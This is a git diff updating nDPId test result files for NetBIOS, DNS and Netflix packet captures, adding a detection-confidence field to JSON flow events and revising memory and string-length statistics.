+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1447772238479,"flow_last_seen":1447772248481,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221882,"flow_last_seen":1447772239929,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":181,"flow_first_seen":1447772210350,"flow_last_seen":1447772269972,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":9050,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00792{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","total-events-serialized":72}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -78,10 +78,10 @@
 ~~ total active/idle flows...: 15/15
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4621217 bytes
-~~ total memory freed........: 4621217 bytes
-~~ total allocations/frees...: 99856/99856
+~~ total memory allocated....: 4701578 bytes
+~~ total memory freed........: 4701578 bytes
+~~ total allocations/frees...: 101446/101446
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 713 chars
-~~ json string avg len.......: 507 chars
+~~ json string max len.......: 799 chars
+~~ json string avg len.......: 550 chars
diff --git a/test/results/netbios_wildcard_dns_query.pcap.out b/test/results/netbios_wildcard_dns_query.pcap.out
index 9df421acf..30b462585 100644
--- a/test/results/netbios_wildcard_dns_query.pcap.out
+++ b/test/results/netbios_wildcard_dns_query.pcap.out
@@ -1,7 +1,7 @@
 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1597866040493,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1597866040493,"pkt":"AAkPCQEKAFBWvdjVCABFAABOhIlAAEARHAYKAUP6CgFCFKF3ADUAOgSEgPAAEAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ckaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ckaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00173{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 178 chars
-~~ json string max len.......: 771 chars
-~~ json string avg len.......: 524 chars
+~~ json string max len.......: 797 chars
+~~ json string avg len.......: 536 chars
diff --git a/test/results/netflix.pcap.out b/test/results/netflix.pcap.out
index 0a1c24087..72f0f5d02 100644
--- a/test/results/netflix.pcap.out
+++ b/test/results/netflix.pcap.out
@@ -3,76 +3,76 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1484319030789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319030789,"pkt":"gCqoTGHM5JjWH70UCABFAAA0e0NAAEAGcrPAqAEHNBhXBs7BAbvkIOdkTYzTZoAREADl8AAAAQEICh9kr+C2r\/ET"}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1484319032865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1484319032865,"pkt":"gCqoTGHM5JjWH70UCABFAABCVrgAAEARoJrAqAEHwKgBAclXADUALqX1KVYBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1484319032866,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1484319032866,"pkt":"gCqoTGHM5JjWH70UCABFAABC8wcAAEARBEvAqAEHwKgBAclXADUALjTPmmEBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="}
-00743{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032865,"flow_last_seen":1484319032866,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319032866,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032865,"flow_last_seen":1484319032866,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319032866,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00740{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1484319032879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1484319032879,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UBAAEAR1U7AqAEBwKgBBwA1yVcA8QwWKVaBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAABvAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFrABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAAMgAENr8RM8BNAAEAAQAAADIABDa\/+KzATQABAAEAAAAyAAQ2ummQwE0AAQABAAAAMgAENroXx8BNAAEAAQAAADIABDaVT4rATQABAAEAAAAyAAQ2uopvwE0AAQABAAAAMgAENshkTsBNAAEAAQAAADIABDa6J1c="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319032865,"flow_last_seen":1484319032879,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1484319032879,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"54.191.17.51"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319032865,"flow_last_seen":1484319032879,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1484319032879,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"54.191.17.51"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1484319032882,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1484319032882,"pkt":"gCqoTGHM5JjWH70UCABFAABSBKEAAP8RM6HAqAEHwKgBAcuUADUAPjWQ0IgBAAABAAAAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1484319032884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":1484319032884,"pkt":"5JjWH70UgCqoTGHMCABFAADS4UJAAEAR1X\/AqAEBwKgBBwA1y5QAvmn70IiBgAABAAgAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQABwAwAAQABAAAAAQAENkXM8cAMAAEAAQAAAAEABDQqmRbADAABAAEAAAABAAQ2RDCIwAwAAQABAAAAAQAENkQSPsAMAAEAAQAAAAEABDZGuZ3ADAABAAEAAAABAAQ0IoVtwAwAAQABAAAAAQAENpVZIsAMAAEAAQAAAAEABDaUWeg="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032888,"flow_last_seen":1484319032888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319032888,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
